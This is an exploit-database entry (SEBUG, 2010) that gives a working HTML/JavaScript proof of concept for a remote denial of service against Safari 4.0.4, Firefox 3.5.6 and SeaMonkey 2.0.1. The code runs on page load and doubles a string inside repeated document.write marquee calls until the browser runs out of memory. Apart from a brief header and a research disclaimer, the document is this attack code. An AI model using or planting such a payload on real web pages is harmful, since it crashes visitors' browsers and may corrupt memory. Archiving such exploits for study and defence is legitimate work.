Safari v4.0.4, Firefox v3.5.6, SeaMonkey v2.0.1 Remote Denial of Service
SEBUG-ID:19086
SEBUG-Appdir:Apple Safari
Published:2010-02-07
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<!--
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)
Firefox 3.5.6
Safari 4.0.4
SeaMonkey 2.0.1
Author : 599eme Man
Contact : flouf@live.fr
-->
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>// sebug.net [2010-02-08]